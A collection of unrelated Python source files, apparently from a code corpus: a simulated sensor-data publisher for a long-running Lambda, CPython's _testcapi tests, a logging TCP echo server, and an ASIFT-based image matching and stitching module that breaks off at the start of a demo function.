target=app.run, kwargs={"host": "0.0.0.0", "port": 8180, "threaded": True}
).start()
def sensor_data_server():
""" Generates and publishes sensor data if enabled
Data is generated roughly every 0.05 seconds (about 20 messages per second); each message
contains hertz, temperature, and timestamp values (see simulated_data above).
"""
while True:
lock.acquire()
if generate_sensor_data:
lock.release()
data = simulated_data()
# Publish data to Lambda Producer directly
try:
client.publish(
topic="sensor_data", qos=0, payload=json.dumps(data).encode("utf-8")
)
except Exception as e:
logger.error(f"Error appending: {e}")
sleep(0.05)
continue
else:
lock.release()
# Data generation disabled, pause before checking again
sleep(0.05)
def app_startup():
"""Startup all separate threads"""
logger.info("Starting API")
api_thread = Thread(target=api_server, args=[])
api_thread.start()
logger.info("Starting simulated sensor data")
sensor_data_thread = Thread(target=sensor_data_server)
sensor_data_thread.start()
app_startup()
def main(event, context):
"""Called per invoke, we should never see this (long running Lambda)"""
return
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from __future__ import with_statement
import sys
import time
import random
import unittest
import threading
from test import support
import _testcapi
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l has grown to n entries
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
for i in range(context.nThreads):
t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
t.start()
threads.append(t)
self.pendingcalls_wait(context.l, n, context)
for t in threads:
t.join()
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
def test_main():
support.run_unittest(CAPITest)
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
if support.verbose:
print("internal", name)
test()
# some extra thread-state tests driven via _testcapi
def TestThreadState():
if support.verbose:
print("auto-thread-state")
idents = []
def callback():
idents.append(_thread.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
if idents.count(_thread.get_ident()) != 3:
raise support.TestFailed(
"Couldn't find main thread correctly in the list")
try:
_testcapi._test_thread_state
have_thread_state = True
except AttributeError:
have_thread_state = False
if have_thread_state:
import _thread
import time
TestThreadState()
import threading
t = threading.Thread(target=TestThreadState)
t.start()
t.join()
support.run_unittest(TestPendingCalls, Test6012)
if __name__ == "__main__":
test_main()
|
main.py
|
import socket
import logging.config
from datetime import datetime
from multiprocessing import Process
from signal import signal, SIGTERM
LISTEN_PORT = 8000
ECHO_LOG_PATH = './logs/sessions/'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': '%(levelname)3.3s [%(name)s:%(funcName)s] %(message)s',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'level': 'INFO',
'formatter': 'simple',
'stream': 'ext://sys.stdout',
},
'file': {
'class': 'logging.FileHandler',
'level': 'INFO',
'filename': './logs/echo_server_log.log',
'formatter': 'simple',
},
},
'root': {
'level': 'INFO',
'handlers': ['console', 'file'],
'propagate': True,
}
}
logging.config.dictConfig(LOGGING)
logger = logging.getLogger('')
def keep_alive(sk, addr, callback):
signal(SIGTERM, callback)
log_filename = datetime.now().strftime('%Y-%m-%d_%H:%M:%S_{}').format(addr)
with open(ECHO_LOG_PATH + log_filename, 'w') as log_file:
while True:
data = sk.recv(2048)
if not data:
callback()
return
sk.send(data)
log_file.write(str(data)[2:-1])
def get_termination_callback(sk):
# the callback doubles as a SIGTERM handler, so accept the (signum, frame) arguments the signal
# module passes while still allowing direct calls with no arguments
def callback(*_args):
sk.shutdown(socket.SHUT_WR)
sk.close()
return callback
def setup():
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
connection.bind(('0.0.0.0', LISTEN_PORT))
connection.listen(0)
thread_list = []
try:
while True:
new_socket, address = connection.accept()
addr, port = address
logger.info('connection from {}:{}'.format(addr, port))
callback = get_termination_callback(new_socket)
p = Process(target=keep_alive, args=(new_socket, addr, callback))
p.start()
thread_list.append(p)
except KeyboardInterrupt:
for p in thread_list:
p.terminate()
if __name__ == "__main__":
try:
setup()
except Exception:
logger.exception('Something went wrong')
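# Illustrative usage (sketch): with the server running, `nc localhost 8000` opens an echo session;
# every chunk received from the client is sent back unchanged and appended to a per-session file
# under ./logs/sessions/ named with the connection timestamp and the client address.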
|
prototype_restoration.py
|
from __future__ import division
from __future__ import print_function
# ---------------------------- IMPORTS ---------------------------- #
# multiprocessing
from builtins import zip
from builtins import range
from builtins import object
from past.utils import old_div
import itertools as it
from multiprocessing.pool import ThreadPool as Pool
# three-party
import cv2
import numpy as np
# custom
from RRtool.RRtoolbox.lib import plotter, cache, config, image
from RRtool.RRtoolbox import filter,basic as ar
from RRtool.RRtoolbox.lib.arrayops import convert
# ---------------------------- GLOBALS ---------------------------- #
cpc = cv2.getNumberOfCPUs()
print("configured to use {} cpus".format(cpc))
pool = Pool(processes = cpc) # DO NOT USE when this module is imported and this line runs with it; it creates a deadlock
feature_name = 'sift-flann'
paths = config.ConfigFile()
# ---------------------------- DECORATORS ---------------------------- #
def getalfa(foregray,backgray,window = None):
""" get alfa transparency for merging to retinal images
:param foregray: image on top
:param backgray: image at bottom
:param window: window used to customizing alfa, values go from 0 for transparency to any value
where the maximum is visible i.e a window with all the same values does nothing.
a binary image can be used, where 0 is transparent and 1 is visible.
If not window is given alfa is left as intended.
:return: float window modified by alfa
"""
normalize = filter.normalize
normsigmoid = filter.normsigmoid
backmask = normalize(normsigmoid(backgray,10,180)+normsigmoid(backgray,3.14,192)+normsigmoid(backgray,-3.14,45))
foremask = normalize(normsigmoid(foregray,-1,242)*normsigmoid(foregray,3.14,50))
foremask = normalize(foremask * backmask)
foremask[foremask>0.9] = 2.0
ksize = (21,21)
foremask = normalize(cv2.blur(foremask,ksize))
if window is not None: foremask *= normalize(window)
return foremask
# ----------------------------VISUALIZER FUNCTIONS---------------------------- #
def matchExplorer(win, img1, img2, kp_pairs, status = None, H = None, show=True):
# functions
## GET INITIAL VISUALIZATION
if len(img1.shape)<3:
img1 = cv2.cvtColor(img1,cv2.COLOR_GRAY2BGR)
if len(img2.shape)<3:
img2 = cv2.cvtColor(img2,cv2.COLOR_GRAY2BGR)
h1, w1 = img1.shape[:2] # obtaining image1 dimensions
h2, w2 = img2.shape[:2] # obtaining image2 dimensions
# imgf and imgb will be visualized horizontally (left-right)
vis = np.zeros((max(h1, h2), w1+w2,3), np.uint8) # making visualization image
vis[:h1, :w1] = img1 # imgf at the left of vis
vis[:h2, w1:w1+w2] = img2 # imgf at the right of vis
if status is None:
status = np.ones(len(kp_pairs), np.bool_) # making sure every pair of keypoints is graphed
kp_pairs = [(dict2keyPoint(i),dict2keyPoint(j)) for i,j in kp_pairs]
p1 = np.int32([kpp[0].pt for kpp in kp_pairs]) # pair of coordinates for imgf
p2 = np.int32([kpp[1].pt for kpp in kp_pairs]) + (w1, 0) # pair of coordinates for imgb
if H is not None: # the projected corners are only needed (and computable) when a homography exists
corners = np.float32([[0, 0], [w1, 0], [w1, h1], [0, h1]])
corners = np.int32(cv2.perspectiveTransform(corners.reshape(1, -1, 2), H).reshape(-1, 2) + (w1, 0))
def drawline(self):
vis = self.rimg
self.thick = int(filter.sigmoid(vis.shape[0] * vis.shape[1], 1723567, 8080000, 5, 1))
if H is not None: # enclosing object
rcorners = np.array([self.real2render(corner[0],corner[1]) for corner in corners])
cv2.polylines(vis, [rcorners], True, self.framecolor) # draw rendered TM encasing
rp1 = []
rp2 = []
for (x1, y1), (x2, y2), inlier in zip(p1, p2, status):
rx1,ry1 = self.real2render(x1,y1) # real to render
rx2,ry2 = self.real2render(x2,y2) # real to render
rp1.append((rx1,ry1))
rp2.append((rx2,ry2))
r = self.thick
if inlier and self.showgoods: # drawing circles (good keypoints)
col = self.goodcolor
cv2.circle(vis, (rx1, ry1), r, col, -1) # for left keypoint (imgf)
cv2.circle(vis, (rx2, ry2), r, col, -1) # for right keypoint (imgf)
elif self.showbads: # drawing x marks (wrong keypoints)
col = self.badcolor
thickness = r
# for left keypoint (imgf)
cv2.line(vis, (rx1-r, ry1-r), (rx1+r, ry1+r), col, thickness)
cv2.line(vis, (rx1-r, ry1+r), (rx1+r, ry1-r), col, thickness)
# for right keypoint (imgf)
cv2.line(vis, (rx2-r, ry2-r), (rx2+r, ry2+r), col, thickness)
cv2.line(vis, (rx2-r, ry2+r), (rx2+r, ry2-r), col, thickness)
# drawing lines for non-onmouse event
self.rp1 = np.int32(rp1)
self.rp2 = np.int32(rp2)
self.vis0 = vis.copy() # saving state of the visualization for onmouse event
# get rendered kp_pairs
self.kp_pairs2 = apply2kp_pairs(kp_pairs,self.real2render,self.real2render)
# drawing lines for non-onmouse event
for (rx1, ry1), (rx2, ry2), inlier in zip(rp1, rp2, status):
if inlier and self.showgoods:
cv2.line(vis, (rx1, ry1), (rx2, ry2), self.goodcolor,r)
self.vis = vis.copy() # visualization with all inliers
def drawrelation(self):
if self.flags & cv2.EVENT_FLAG_LBUTTON:
x,y = self.rx, self.ry
cur_vis = self.vis0.copy() # actual visualization
r = self.thick + 8 # proximity to keypoint
m = (ar.anorm(self.rp1 - (x, y)) < r) | (ar.anorm(self.rp2 - (x, y)) < r)
idxs = np.where(m)[0] # get indexes near pointer
kp1s, kp2s = [], []
for i in idxs: # for all keypoints near the pointer
(rx1, ry1), (rx2, ry2) = self.rp1[i], self.rp2[i] # my keypoint
col = (self.badcolor, self.goodcolor)[status[i]] # choosing False=red,True=green
cv2.line(cur_vis, (rx1,ry1), (rx2,ry2), col, self.thick) # drawing line
# keypoints to show on event
kp1, kp2 = self.kp_pairs2[i]
kp1s.append(kp1)
kp2s.append(kp2)
# drawing keypoints near pointer for imgf and imgb
cur_vis = cv2.drawKeypoints(cur_vis, kp1s, flags=4, color=self.kpcolor)
cur_vis = cv2.drawKeypoints(cur_vis, kp2s, flags=4, color=self.kpcolor)
self.rimg = cur_vis
else:
self.rimg = self.vis
if self.y is not None and self.x is not None:
self.builtinplot(self.sample[self.y,self.x])
def randomColor():
return (np.random.randint(0,255), np.random.randint(0,255), np.random.randint(0,255))
def mousefunc(self):
if self.builtincontrol():
self.updaterenderer()
drawline(self)
if self.mousemoved:
drawrelation(self)
def keyfunc(self):
if self.builtincmd():
drawline(self)
if self.y is not None and self.x is not None:
self.builtinplot(self.img[self.y,self.x])
else:
self.builtinplot()
self = plotter.plotim(win, vis)
self.mousefunc = mousefunc
self.keyfunc = keyfunc
self.showgoods = True
self.showbads = False
self.__dict__.update(image.colors)
self.randomColor = randomColor
self.goodcolor = self.green
self.badcolor = self.red
self.kpcolor = self.orange
self.framecolor = self.blue
self.cmdlist.extend(["showgoods","showbads","framecolor","kpcolor","badcolor","goodcolor"])
drawline(self)
# show window
if show: self.show()
return self.rimg # return coordinates
def explore_match(win, img1, img2, kp_pairs, status = None, H = None, show=True):
"""
This function draws a set of keypoint pairs obtained on a match method of a descriptor
on two images imgf and imgb
:param win: window's name (str)
:param img1: image1 (numpy array)
:param img2: image2 (numpy array)
:param kp_pairs: zip(keypoint1, keypoint2)
:param status: inlier mask obtained from cv2.findHomography (default=None)
:param H: homography matrix obtained from cv2.findHomography (default=None)
:param show: whether to open a window and display the visualization (default=True)
:return: vis (image with the matching result)
"""
# colors to use
green = (0, 255, 0)
red = (0, 0, 255)
white = (255, 255, 255)
kp_color = (51, 103, 236)
if len(img1.shape)<3:
img1 = cv2.cvtColor(img1,cv2.COLOR_GRAY2BGR)
if len(img2.shape)<3:
img2 = cv2.cvtColor(img2,cv2.COLOR_GRAY2BGR)
h1, w1 = img1.shape[:2] # obtaining image1 dimensions
h2, w2 = img2.shape[:2] # obtaining image2 dimensions
# imgf and imgb will be visualized horizontally (left-right)
vis = np.zeros((max(h1, h2), w1+w2,3), np.uint8) # making visualization image
vis[:h1, :w1] = img1 # imgf at the left of vis
vis[:h2, w1:w1+w2] = img2 # imgf at the right of vis
#vis = cv2.cvtColor(vis, cv2.COLOR_GRAY2BGR) # changing color attribute to background image
if H is not None: # enclosing object
corners = np.float32([[0, 0], [w1, 0], [w1, h1], [0, h1]])
corners = np.int32( cv2.perspectiveTransform(corners.reshape(1, -1, 2), H).reshape(-1, 2) + (w1, 0) )
cv2.polylines(vis, [corners], True, red)
if status is None:
status = np.ones(len(kp_pairs), np.bool_) # making sure every pair of keypoints is graphed
kp_pairs = [(dict2keyPoint(i),dict2keyPoint(j)) for i,j in kp_pairs]
p1 = np.int32([kpp[0].pt for kpp in kp_pairs]) # pair of coordinates for imgf
p2 = np.int32([kpp[1].pt for kpp in kp_pairs]) + (w1, 0) # pair of coordinates for imgb
thick = int(filter.sigmoid(vis.shape[0] * vis.shape[1], 1723567, 8080000, 5, 1))
for (x1, y1), (x2, y2), inlier in zip(p1, p2, status):
if inlier: # drawing circles (good keypoints)
col = green
cv2.circle(vis, (x1, y1), thick, col, -1) # for left keypoint (imgf)
cv2.circle(vis, (x2, y2), thick, col, -1) # for right keypoint (imgf)
else: # drawing x marks (wrong keypoints)
col = red
r = thick
thickness = thick
# for left keypoint (imgf)
cv2.line(vis, (x1-r, y1-r), (x1+r, y1+r), col, thickness)
cv2.line(vis, (x1-r, y1+r), (x1+r, y1-r), col, thickness)
# for right keypoint (imgf)
cv2.line(vis, (x2-r, y2-r), (x2+r, y2+r), col, thickness)
cv2.line(vis, (x2-r, y2+r), (x2+r, y2-r), col, thickness)
vis0 = vis.copy() # saving state of the visualization for onmouse event
# drawing lines for non-onmouse event
for (x1, y1), (x2, y2), inlier in zip(p1, p2, status):
if inlier:
cv2.line(vis, (x1, y1), (x2, y2), green,thick)
if show:
cv2.namedWindow(win,cv2.WINDOW_NORMAL) # Can be resized
cv2.imshow(win, vis) # show static image as visualization for non-onmouse event
def onmouse(event, x, y, flags, param):
cur_vis = vis # current visualization; inlier lines are drawn in it
if flags & cv2.EVENT_FLAG_LBUTTON: # if onmouse
cur_vis = vis0.copy() # points and perspective are drawn in it
r = thick+8 # proximity to keypoint
m = (ar.anorm(p1 - (x, y)) < r) | (ar.anorm(p2 - (x, y)) < r)
idxs = np.where(m)[0] # get indexes near pointer
kp1s, kp2s = [], []
for i in idxs: # for all keypoints near the pointer
(x1, y1), (x2, y2) = p1[i], p2[i] # my keypoint
col = (red, green)[status[i]] # choosing False=red,True=green
cv2.line(cur_vis, (x1, y1), (x2, y2), col,thick) # drawing line
# keypoints to show on event
kp1, kp2 = kp_pairs[i]
kp1s.append(kp1)
kp2s.append(kp2)
# drawing keypoints near pointer for imgf and imgb
cur_vis = cv2.drawKeypoints(cur_vis, kp1s, flags=4, color=kp_color)
cur_vis[:,w1:] = cv2.drawKeypoints(cur_vis[:,w1:], kp2s, flags=4, color=kp_color)
cv2.imshow(win, cur_vis) # show visualization
cv2.setMouseCallback(win, onmouse)
cv2.waitKey()
cv2.destroyWindow(win)
return vis
# ----------------------------SPECIALIZED FUNCTIONS---------------------------- #
def init_feature(name,features = None):
"""
This function takes parameters from a command to initialize a detector and matcher
:param name: "<sift|surf|orb>[-flann]" (str) Ex: "sift-flann"
:return: detector, matcher
"""
FLANN_INDEX_KDTREE = 1 # bug: flann enums are missing
FLANN_INDEX_LSH = 6
if features is None: features = {}
if name not in features: # if called with a different name
chunks = name.split('-')
if chunks[0] == 'sift':
detector = cv2.SIFT() # Scale-invariant feature transform
norm = cv2.NORM_L2 # distance measurement to be used
elif chunks[0] == 'surf':
detector = cv2.SURF(800) # Hessian Threshold to 800
norm = cv2.NORM_L2 # distance measurement to be used
elif chunks[0] == 'orb':
detector = cv2.ORB(400) # binary string based descriptors
norm = cv2.NORM_HAMMING # Hamming distance
else:
return None, None
if 'flann' in chunks: # FLANN based Matcher
if norm == cv2.NORM_L2: # for SIFT and SURF
flann_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)
else: # for ORB
flann_params= dict(algorithm = FLANN_INDEX_LSH,
table_number = 6, # 12
key_size = 12, # 20
multi_probe_level = 1) #2
matcher = cv2.FlannBasedMatcher(flann_params, {}) # bug : need to pass empty dict (#1329)
else: # brute force matcher
matcher = cv2.BFMatcher(norm)
features[name] = detector, matcher
detector, matcher = features[name] # if possible get buffered detector and matcher
return detector, matcher
detector, matcher = init_feature(feature_name) # global detector and matcher
def affine_skew(tilt, phi, img, mask=None):
'''
affine_skew(tilt, phi, img, mask=None) -> skew_img, skew_mask, Ai
Ai - is an affine transform matrix from skew_img to img
'''
h, w = img.shape[:2]
if mask is None:
mask = np.zeros((h, w), np.uint8)
mask[:] = 255
A = np.float32([[1, 0, 0], [0, 1, 0]])
if phi != 0.0:
phi = np.deg2rad(phi)
s, c = np.sin(phi), np.cos(phi)
A = np.float32([[c,-s], [ s, c]])
corners = [[0, 0], [w, 0], [w, h], [0, h]]
tcorners = np.int32( np.dot(corners, A.T) )
x, y, w, h = cv2.boundingRect(tcorners.reshape(1,-1,2))
A = np.hstack([A, [[-x], [-y]]])
img = cv2.warpAffine(img, A, (w, h), flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REPLICATE)
if tilt != 1.0:
s = 0.8*np.sqrt(tilt*tilt-1)
img = cv2.GaussianBlur(img, (0, 0), sigmaX=s, sigmaY=0.01)
img = cv2.resize(img, (0, 0), fx=old_div(1.0,tilt), fy=1.0, interpolation=cv2.INTER_NEAREST)
A[0] /= tilt
if phi != 0.0 or tilt != 1.0:
h, w = img.shape[:2]
mask = cv2.warpAffine(mask, A, (w, h), flags=cv2.INTER_NEAREST)
Ai = cv2.invertAffineTransform(A)
return img, mask, Ai
########################### CONVERSIONS #####################
def keyPoint2tuple(keypoint):
""" obj.angle, obj.class_id, obj.octave, obj.pt, obj.response, obj.size"""
return (keypoint.pt, keypoint.size, keypoint.angle, keypoint.response, keypoint.octave, keypoint.class_id)
def tuple2keyPoint(points, func = cv2.KeyPoint):
""" KeyPoint([x, y, _size[, _angle[, _response[, _octave[, _class_id]]]]]) -> <KeyPoint object> """
return func(*(points[0][0],points[0][1],points[1],points[2], points[3],points[4], points[5]))
def dict2keyPoint(d, func = cv2.KeyPoint):
""" KeyPoint([x, y, _size[, _angle[, _response[, _octave[, _class_id]]]]]) -> <KeyPoint object> """
return func(*(d["pt"][0],d["pt"][1],d["size"],d["angle"], d["response"],d["octave"], d["class_id"]))
class SimKeyPoint(object):
# FIXME: correct for memoizer: some warnings are created if the script is run as __main__
# it would be great if cv2.KeyPoint did not have pickling incompatibilities
def __init__(self,*args):
if len(args)==1:
obj = args[0]
if isinstance(obj,dict): # it got a dictionary
self.__dict__.update(obj)
return
elif isinstance(obj,tuple):
args = obj
else: # it got cv2.Keypoint
self.angle = obj.angle
self.class_id = obj.class_id
self.octave = obj.octave
self.pt = obj.pt
self.response = obj.response
self.size = obj.size
return
# the tuple is unpacked as in cv2.KeyPoint
self.pt =args[0]
self.size=args[1]
self.angle =args[2]
self.response=args[3]
self.octave=args[4]
self.class_id=args[5]
def apply2kp_pairs(kp_pairs,kp1_pair,kp2_pair,func=None):
"""
apply to kp_pairs
:param kp_pairs:
:param kp1_pair:
:param kp2_pair:
:param func: function to build new copy of keypoint
:return:
"""
def withtupple(keypoint,kp_op):
if func:
keypoint = func(keypoint)
try:
keypoint = keypoint.copy()
keypoint["pt"] = np.multiply(keypoint["pt"],kp_op) # transform pt with kp_op
except:
x,y = keypoint.pt
rx,ry = kp_op
keypoint.pt = (x*rx,y*ry)
return keypoint
def withfunc(keypoint,kp_op):
if func:
keypoint = func(keypoint)
try:
keypoint = keypoint.copy()
keypoint["pt"] = kp_op(*keypoint["pt"]) # transform pt with kp_op
except:
x,y = keypoint.pt
keypoint.pt = kp_op(x,y)
return keypoint
if type(kp1_pair) is tuple: # expected tuple operands
func1 = withtupple
else:
func1 = withfunc
if type(kp2_pair) is tuple: # expected tuple operands
func2 = withtupple
else:
func2 = withfunc
return [(func1(i,kp1_pair),func2(j,kp2_pair)) for i,j in kp_pairs]
def spairs2opairs(kp_pairs,osrc_sh,sscr_sh,odst_sh,sdst_sh,func=None):
"""
convert scaled kp_pairs to original kp_pairs
:param kp_pairs: list of kp_pairs
:param osrc_sh: original source's shape
:param sscr_sh: scaled source's shape
:param odst_sh: original destination's shape
:param sdst_sh: scaled destination's shape
:param func: function to build new copy of keypoint
:return:
"""
kp1_pair = convert.getSOpointRelation(osrc_sh, sscr_sh) # fore
kp2_pair = convert.getSOpointRelation(odst_sh, sdst_sh) # back
return apply2kp_pairs(kp_pairs,kp1_pair,kp2_pair,func=func)
########################### END OF CONVERSIONS #####################
@cache.memoize(paths.TEMPPATH, ignore=["pool"])
def ASIFT(feature_name, img, mask=None, pool=pool):
'''
asift(feature_name, img, mask=None, pool=None) -> keypoints, descrs
Apply a set of affine transformations to the image, detect keypoints and
reproject them into initial image coordinates.
See http://www.ipol.im/pub/algo/my_affine_sift/ for the details.
ThreadPool object may be passed to speedup the computation.
'''
# building the parameters of tilt and rotation variations
detector = init_feature(feature_name)[0] # it must get detector object of cv2 here to prevent conflict with memoizers
params = [(1.0, 0.0)]
# phi rotations for t tilts of the image
for t in 2**(0.5*np.arange(1,6)):
for phi in np.arange(0, 180, old_div(72.0, t)):
params.append((t, phi))
def f(p):
t, phi = p #tilt, phi (rotation)
# computing the affine transform
timg, tmask, Ai = affine_skew(t, phi, img)
# Find keypoints and descriptors with the detector
keypoints, descrs = detector.detectAndCompute(timg, tmask)
for kp in keypoints:
x, y = kp.pt
kp.pt = tuple( np.dot(Ai, (x, y, 1)) )
if descrs is None:
descrs = []
return keypoints, descrs
if pool is None:
ires = map(f, params)  # itertools.imap does not exist on Python 3; the built-in map is lazy there
else:
ires = pool.imap(f, params)
keypoints, descrs = [], []
for i, (k, d) in enumerate(ires):
print('affine sampling: %d / %d\r' % (i+1, len(params)), end=' ')
keypoints.extend(k)
descrs.extend(d)
keypoints = [SimKeyPoint(obj).__dict__ for obj in keypoints]  # plain dicts pickle cleanly for the memoizer
#return keyPoint2tuple(keypoints), np.array(descrs)
return keypoints, np.array(descrs)
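# Note on the sampling above (following the ASIFT reference linked in the docstring): tilts are
# t = 2**(k/2) for k = 1..5 and, for each tilt, the in-plane rotation phi sweeps [0, 180) in steps
# of 72/t degrees, so stronger tilts get a denser rotation sweep; (1.0, 0.0) keeps the original image.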
def multipleASIFT(imgs,feature_name=feature_name):
"""
Affine-SIFT for N images
:param imgs: images to apply asift
:param feature_name: eg. SIFT SURF ORB
:return: [(kp1,desc1),...,(kpN,descN)]
"""
#print 'imgf - %d features, imgb - %d features' % (len(kp1), len(kp2))
return [ASIFT(feature_name, img, pool=pool) for img in imgs]
def filter_matches(kp1, kp2, matches, ratio = 0.75):
"""
This function applies a ratio test
:param kp1: raw keypoint 1
:param kp2: raw keypoint 2
:param matches: raw matches
:param ratio: filtering ratio
:return: filtered keypoint 1, filtered keypoint 2, keypoint pairs
"""
mkp1, mkp2 = [], []
for m in matches:
if len(m) == 2 and m[0].distance < m[1].distance * ratio:
m = m[0]
mkp1.append( kp1[m.queryIdx] ) # keypoint with Index of the descriptor in query descriptors
mkp2.append( kp2[m.trainIdx] ) # keypoint with Index of the descriptor in train descriptors
p1 = np.float32([kp["pt"] for kp in mkp1])
p2 = np.float32([kp["pt"] for kp in mkp2])
kp_pairs = list(zip(mkp1, mkp2))
return p1, p2, kp_pairs
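# Note: the distance check above is Lowe's ratio test; a candidate match m[0] is kept only when it
# is clearly better than the runner-up m[1] (distance < ratio * m[1].distance, ratio=0.75 by
# default), which removes ambiguous correspondences before homography estimation in MATCH below.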
@cache.memoize(paths.TEMPPATH)
def MATCH(feature_name,kp1,desc1,kp2,desc2):
"""
use matcher and asift output to obtain Transformation matrix (TM)
:param feature_name: eg. BFMatcher, FlannBasedMatcher
:param kp1: keypoints of source image
:param desc1: descriptors of kp1
:param kp2: keypoints of destine image
:param desc2: descriptors of kp2
:return: TM
# http://docs.opencv.org/3.0-beta/doc/py_tutorials/py_feature2d/py_feature_homography/py_feature_homography.html
"""
matcher = init_feature(feature_name)[1] # it must get matcher object of cv2 here to prevent conflict with memoizers
# BFMatcher.knnMatch() returns k best matches where k is specified by the user
raw_matches = matcher.knnMatch(desc1, trainDescriptors = desc2, k = 2) #2
# If k=2, it will draw two match-lines for each keypoint.
# So we have to pass a status if we want to selectively draw it.
p1, p2, kp_pairs = filter_matches(kp1, kp2, raw_matches) #ratio test of 0.75
if len(p1) >= 4:
H, status = cv2.findHomography(p1, p2, cv2.RANSAC, 5.0) # status specifies the inlier and outlier points
print('%d / %d inliers/matched' % (np.sum(status), len(status)))
# do not draw outliers (there will be a lot of them)
#kp_pairs = [kpp for kpp, flag in zip(kp_pairs, status) if flag] # uncomment to give only good kp_pairs
else:
H, status = None, None
print('%d matches found, not enough for homography estimation' % len(p1))
return H, status, kp_pairs
def multipleMATCH(multipleASIFT, feature_name=feature_name):
"""
:param multipleASIFT: from function that returns [(kp1,desc1),...,(kpN,descN)]
:param feature_name:
:return: [(H1, mask1, kp_pairs1),....(HN, maskN, kp_pairsN)]
"""
kp1,desc1 = multipleASIFT[0]
return [MATCH(feature_name,kp1,desc1,kpN,descN) for kpN,descN in multipleASIFT[1:]]
def MATCHto(cmp, multipleASIFT, feature_name=feature_name):
"""
:param cmp: (kp0,desc0)
:param multipleASIFT: from function that returns [(kp1,desc1),...,(kpN,descN)]
:param feature_name:
:return: [(H1, mask1, kp_pairs1),....(HN, maskN, kp_pairsN)]
"""
kp1,desc1 = cmp
return [MATCH(feature_name,kp1,desc1,kpN,descN) for kpN,descN in multipleASIFT]
def invertH(H):
# inverse perspective
return np.linalg.inv(H)
def boxpads(bx,points):
points = points
minX,minY = np.min(points,0) # left_top
maxX,maxY = np.max(points,0) # right_bottom
x0,y0 = bx[0] # left_top
x1,y1 = bx[1] # right_bottom
top,bottom,left,right = 0.0,0.0,0.0,0.0
if minX<x0: left = x0-minX
if minY<y0: top = y0-minY
if maxX>x1: right = maxX-x1
if maxY>y1: bottom = maxY-y1
return [(left,top),(right,bottom)]
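# Worked example (hypothetical numbers): with bx = [(0, 0), (400, 400)] and projected points
# spanning x in [-50, 430] and y in [10, 390], boxpads returns [(50, 0), (30, 0)]: 50 px of
# padding are needed on the left and 30 px on the right, none on the top or bottom.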
def transformPoint(p,H):
return cv2.perspectiveTransform(np.float64([[p]]), H)
def transformPoints(p,H):
return cv2.perspectiveTransform(np.float64([p]), H)
def getTransformedCorners(shape,H):
h,w = shape[:2]
corners = [[0, 0], [w, 0], [w, h], [0, h]] # get list of image corners
projection = transformPoints(corners, H) # get perspective of corners with transformation matrix
return projection.reshape(-1,2) # return projection points
def pads(shape1,shape2,H):
h,w = shape2[:2] # get hight,width of image
bx = [[0,0],[w,h]] # make box
corners = getTransformedCorners(shape1,H) # get corners from image
return boxpads(bx,corners)
def superpose(im1,im2,H):
# im1 on top of im2
# im1(x,y)*H = im1(u,v) -> im1(u,v) + im2(u,v)
[(left,top),(right,bottom)] = pads(im1.shape,im2.shape,H)
moveH = np.float64([[1,0,left],[0,1,top],[0,0,1]])
movedH = moveH.dot(H)
# need: top_left, bottom_left, top_right,bottom_right
h2,w2 = im2.shape
w,h = int(left + right + w2),int(top + bottom + h2)
back = cv2.warpPerspective(im2,moveH,(w,h))
fore = cv2.warpPerspective(im1,movedH,(w,h))
alfa = cv2.warpPerspective(np.ones(im1.shape[:2]),movedH,(w,h))
im = ar.overlay(back, fore, alfa)
return im,movedH
@cache.memoize(paths.TEMPPATH) # convert cv2.bilateralfilter to memoized bilateral filter
def bilateralFilter(im,d,sigmaColor,sigmaSpace):
return cv2.bilateralFilter(im,d,sigmaColor,sigmaSpace)
def asif_demo(**opts):
